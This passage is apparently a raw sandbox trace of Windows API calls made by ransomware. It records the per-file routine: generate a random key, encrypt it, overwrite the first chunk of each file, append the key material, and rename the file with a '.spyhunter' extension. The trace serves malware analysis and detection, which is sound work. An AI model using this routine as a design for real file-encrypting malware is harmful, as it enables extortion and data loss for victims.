pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.spyhunter") returned 83 [0129.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.spyhunter")) returned 1 [0129.555] GetProcessHeap () returned 0x2c0000 [0129.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.555] GetProcessHeap () returned 0x2c0000 [0129.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.555] GetProcessHeap () returned 0x2c0000 [0129.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4858 | out: hHeap=0x2c0000) returned 1 [0129.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f468 | out: pbBuffer=0x270f468) returned 1 [0129.669] GetProcessHeap () returned 0x2c0000 [0129.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f460*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f460*=0x30) returned 1 [0129.669] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.693] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0129.693] StrStrW (lpFirst="mpengine.dll", lpSrch=".txt") returned 0x0 [0129.693] GetProcessHeap () returned 0x2c0000 [0129.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.693] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f424, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f424*=0x2800, lpOverlapped=0x0) returned 1 [0129.706] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.706] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f424, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f424*=0x2800, lpOverlapped=0x0) returned 1 [0129.706] GetProcessHeap () returned 0x2c0000 [0129.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.706] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.706] WriteFile (in: hFile=0x120, lpBuffer=0x270f464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f424, lpOverlapped=0x0 | out: lpBuffer=0x270f464*, lpNumberOfBytesWritten=0x270f424*=0x4, lpOverlapped=0x0) returned 1 [0129.708] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f424, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f424*=0x30, lpOverlapped=0x0) returned 1 [0129.708] CloseHandle (hObject=0x120) returned 1 [0129.708] GetProcessHeap () returned 0x2c0000 [0129.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.708] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.spyhunter") returned 126 [0129.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll.spyhunter")) returned 1 [0129.709] GetProcessHeap () returned 0x2c0000 [0129.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.709] GetProcessHeap () returned 0x2c0000 [0129.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.709] GetProcessHeap () returned 0x2c0000 [0129.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47958 | out: hHeap=0x2c0000) returned 1 [0129.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f468 | out: pbBuffer=0x270f468) returned 1 [0129.709] GetProcessHeap () returned 0x2c0000 [0129.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f460*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f460*=0x30) returned 1 [0129.709] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.747] GetProcessHeap () returned 0x2c0000 [0129.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.747] GetProcessHeap () returned 0x2c0000 [0129.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cce8 | out: hHeap=0x2c0000) returned 1 [0129.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f458 | out: pbBuffer=0x270f458) returned 1 [0129.753] GetProcessHeap () returned 0x2c0000 [0129.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f450*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f450*=0x30) returned 1 [0129.753] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0129.753] StrStrW (lpFirst="maintenanceservice-install.log", lpSrch=".txt") returned 0x0 [0129.754] GetProcessHeap () returned 0x2c0000 [0129.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.754] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f414*=0xa4, lpOverlapped=0x0) returned 1 [0129.754] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.754] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x270f414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f414*=0xa4, lpOverlapped=0x0) returned 1 [0129.755] GetProcessHeap () returned 0x2c0000 [0129.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.755] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.755] WriteFile (in: hFile=0x17c, lpBuffer=0x270f454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f414, lpOverlapped=0x0 | out: lpBuffer=0x270f454*, lpNumberOfBytesWritten=0x270f414*=0x4, lpOverlapped=0x0) returned 1 [0129.755] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f414, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f414*=0x30, lpOverlapped=0x0) returned 1 [0129.755] CloseHandle (hObject=0x17c) returned 1 [0129.755] GetProcessHeap () returned 0x2c0000 [0129.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.755] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.spyhunter") returned 72 [0129.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.spyhunter" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.spyhunter")) returned 1 [0129.756] GetProcessHeap () returned 0x2c0000 [0129.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.756] GetProcessHeap () returned 0x2c0000 [0129.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.756] GetProcessHeap () returned 0x2c0000 [0129.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c852f8 | out: hHeap=0x2c0000) returned 1 [0129.868] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f450 | out: pbBuffer=0x270f450) returned 1 [0129.868] GetProcessHeap () returned 0x2c0000 [0129.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0129.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270f448*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270f448*=0x30) returned 1 [0129.869] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.876] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0129.876] StrStrW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.876] GetProcessHeap () returned 0x2c0000 [0129.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.877] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f40c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f40c*=0x16a, lpOverlapped=0x0) returned 1 [0129.877] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.878] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x270f40c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f40c*=0x16a, lpOverlapped=0x0) returned 1 [0129.878] GetProcessHeap () returned 0x2c0000 [0129.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.878] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.878] WriteFile (in: hFile=0x17c, lpBuffer=0x270f44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f40c, lpOverlapped=0x0 | out: lpBuffer=0x270f44c*, lpNumberOfBytesWritten=0x270f40c*=0x4, lpOverlapped=0x0) returned 1 [0129.878] WriteFile (in: hFile=0x17c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f40c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270f40c*=0x30, lpOverlapped=0x0) returned 1 [0129.878] CloseHandle (hObject=0x17c) returned 1 [0129.878] GetProcessHeap () returned 0x2c0000 [0129.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.878] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.spyhunter") returned 70 [0129.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn.spyhunter")) returned 1 [0129.879] GetProcessHeap () returned 0x2c0000 [0129.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.879] GetProcessHeap () returned 0x2c0000 [0129.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0129.879] GetProcessHeap () returned 0x2c0000 [0129.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85168 | out: hHeap=0x2c0000) returned 1 [0129.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f448 | out: pbBuffer=0x270f448) returned 1 [0129.880] GetProcessHeap () returned 0x2c0000 [0129.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0129.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270f440*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270f440*=0x30) returned 1 [0129.880] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.881] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0129.881] StrStrW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.881] GetProcessHeap () returned 0x2c0000 [0129.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.881] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f404*=0x152, lpOverlapped=0x0) returned 1 [0129.882] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.882] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x270f404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f404*=0x152, lpOverlapped=0x0) returned 1 [0129.882] GetProcessHeap () returned 0x2c0000 [0129.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.882] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.882] WriteFile (in: hFile=0x17c, lpBuffer=0x270f444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f404, lpOverlapped=0x0 | out: lpBuffer=0x270f444*, lpNumberOfBytesWritten=0x270f404*=0x4, lpOverlapped=0x0) returned 1 [0129.882] WriteFile (in: hFile=0x17c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f404, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270f404*=0x30, lpOverlapped=0x0) returned 1 [0129.882] CloseHandle (hObject=0x17c) returned 1 [0129.882] GetProcessHeap () returned 0x2c0000 [0129.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0129.894] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.spyhunter") returned 66 [0129.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn.spyhunter")) returned 1 [0129.993] GetProcessHeap () returned 0x2c0000 [0129.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0129.993] GetProcessHeap () returned 0x2c0000 [0129.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0129.993] GetProcessHeap () returned 0x2c0000 [0129.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cf78 | out: hHeap=0x2c0000) returned 1 [0129.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f438 | out: pbBuffer=0x270f438) returned 1 [0129.997] GetProcessHeap () returned 0x2c0000 [0129.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0129.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270f430*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270f430*=0x30) returned 1 [0129.998] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0129.998] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".txt") returned 0x0 [0129.998] GetProcessHeap () returned 0x2c0000 [0129.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.998] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f3f4*=0x2800, lpOverlapped=0x0) returned 1 [0130.008] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.008] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f3f4*=0x2800, lpOverlapped=0x0) returned 1 [0130.008] GetProcessHeap () returned 0x2c0000 [0130.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0130.008] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.008] WriteFile (in: hFile=0x17c, lpBuffer=0x270f434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3f4, lpOverlapped=0x0 | out: lpBuffer=0x270f434*, lpNumberOfBytesWritten=0x270f3f4*=0x4, lpOverlapped=0x0) returned 1 [0130.027] WriteFile (in: hFile=0x17c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270f3f4*=0x30, lpOverlapped=0x0) returned 1 [0130.027] CloseHandle (hObject=0x17c) returned 1 [0130.027] GetProcessHeap () returned 0x2c0000 [0130.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0130.027] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.spyhunter") returned 131 [0130.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.spyhunter" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.spyhunter")) returned 1 [0130.028] GetProcessHeap () returned 0x2c0000 [0130.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0130.028] GetProcessHeap () returned 0x2c0000 [0130.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.028] GetProcessHeap () returned 0x2c0000 [0130.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3bfc8 | out: hHeap=0x2c0000) returned 1 [0130.167] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f418 | out: pbBuffer=0x270f418) returned 1 [0130.167] GetProcessHeap () returned 0x2c0000 [0130.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0130.167] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f410*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f410*=0x30) returned 1 [0130.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0130.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0130.167] StrStrW (lpFirst="wsRGB.icc", lpSrch=".txt") returned 0x0 [0130.168] GetProcessHeap () returned 0x2c0000 [0130.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0130.168] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f3d4*=0xa74, lpOverlapped=0x0) returned 1 [0130.169] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffff58c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.169] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa74, lpNumberOfBytesWritten=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f3d4*=0xa74, lpOverlapped=0x0) returned 1 [0130.169] GetProcessHeap () returned 0x2c0000 [0130.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0130.169] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.170] WriteFile (in: hFile=0xec, lpBuffer=0x270f414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x270f414*, lpNumberOfBytesWritten=0x270f3d4*=0x4, lpOverlapped=0x0) returned 1 [0130.170] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3d4*=0x30, lpOverlapped=0x0) returned 1 [0130.170] CloseHandle (hObject=0xec) returned 1 [0130.170] GetProcessHeap () returned 0x2c0000 [0130.170] RtlAllocateHeap 